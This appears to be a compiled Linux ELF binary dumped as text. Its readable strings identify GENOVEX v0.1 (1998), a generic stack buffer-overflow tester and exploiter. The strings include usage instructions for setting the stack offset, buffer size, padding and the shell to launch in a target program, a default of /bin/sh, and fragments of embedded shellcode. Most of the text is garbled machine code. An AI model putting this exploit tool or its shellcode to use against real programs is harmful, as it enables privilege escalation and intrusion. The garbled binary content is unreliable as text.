ELF4X4 (444ԀԀXXXXX/lib/ld-linux.so.1  ("" Ȅ<'؄"."5X ?EFQX Y<g\nIu(| 88pHX>hxx<<hlibc.so.5printf_DYNAMICatolmemcpyperrormalloc__environ_init__libc_initenviron__fpu_controlsetenvmemsetstrcmp_finiatexit_GLOBAL_OFFSET_TABLE_exit__setfpucwstrlenexecvp_etext_edata__bss_start_end< |   + 5t%x%|h%h%h%h%h %h(%h0%h8p%h@`%hHP%hP@%hX0%h` %hhYЃ1UUUPSQ̀D$X<P$hZ!PW[&&̀&Sl=lt Ѓ;u[Í6ÐUEPhhjhhEPhI j]UEE9EhEPEU Pu;EE9EE RqEU P‰E둍vEv]UEE9E\EPEU Pu/EE9EE REU 6E띍vEv]UE‹Uʅ ЋUʅ ЋUʅщ щ6]UE P‰U)UEPE PEP Ev]UVShjhhE PEP8@hhE PEPTjhE PEPPhhE PEPdHhhE PEPCDjhE PEP%`=P|=P'vhh1j/HPAP9Tshpgj6EE9E~EU 8-t 6EՍ6E9EE REU dETPXLLP\\LpuEEE\dD\E9Er6DPEU Pu\\D\'v\UэM D\E뇍v\D\TPhXX+@P@PXPhÓ@)XXPt hjhXE‰UR =PtHE+\+PRPPhO PPjAE+PP 5P)uHPhAHP)EHPPHPEP hbh{EPEM]]HPiۋuhEPE=PuhEPE&MEPۈhEPnEE+\Ph*E9\v6MEA搃=`t<`Ph˔j\P`P= t h\EE9EwhE8uYE9Es U61PEH9Es U1PE@RERE+\PhVE됍6dPh:<hDdPhLLjve[^]ÍvU]ÐS`=`t Ѓ;u[Í6Ð@/bin/shUsage: %s [-o stackofs] [-b bufsiz] [-p padsiz] [-s shell] [-i ident] [-e varname] target [args|ident]* is the offset the target's stack pointer will have, relative to this program's. The bigger the buffer size, the less precise it can be. Defaults to %d. is the exact size of the buffer we are overflowing. Defaults to %d and can be approx if using padding. is the padding size. It allows to overwrite other variables between the end of the buffer and the stack pointer. It defaults to %d. is the full path to a shell name to be executed by target. /usr/bin/id very useful. Default: %s. is a pattern used to identify the code string within the target arguments. Defaults to '%s'. is the name of an environment variable to be set to the code string. By default, none is set. is the program to test, followed by some arguments and the pattern used to replace the sensible one. Ex: %s -o 300 -b 260 -s /bin/ls nslookup @ GENOVEX v0.1 - 1998/09/01 - Willy Tarreau GENeric buffer OVerflow tester and EXploiter for Linux. -o-b-p-s-i-eError: padding can not exceed 127 bytes at the moment. Version 0.2 will get rid of this limitation if really needed. Error: buffer too small for shell name + code. - Using buffer size of %d bytes. - ESP set to 0x%08X - 0x%08X = 0x%08X. ****WARNING**** ESP encoding contains 0x00 !! - Padding with %d bytes @rel0x%08X. - Setting the shell name : %s. - Coding the launcher. PS,̀1P\$ - Filling till the start of the buffer : %d bytes. - Setting environment variable %s setenv****WARNING**** code contains 0x00 at 0x%04X : %02X %02X %02X %02X -> launching %s execvp says΄ބ.>N^n~  < pp 01.0101.0101.01GCC: (GNU) 2.7.2.l.3GCC: (GNU) 2.7.2GCC: (GNU) 2.7.2.l.3.symtab.strtab.shstrtab.interp.hash.dynsym.dynstr.rel.bss.rel.plt.init.plt.text.fini.rodata.data.ctors.dtors.got.dynamic.bss.note.commentԀ#) 1<<9 B   pKQVT\ b `jXXp``whh~ppD<<,<<x>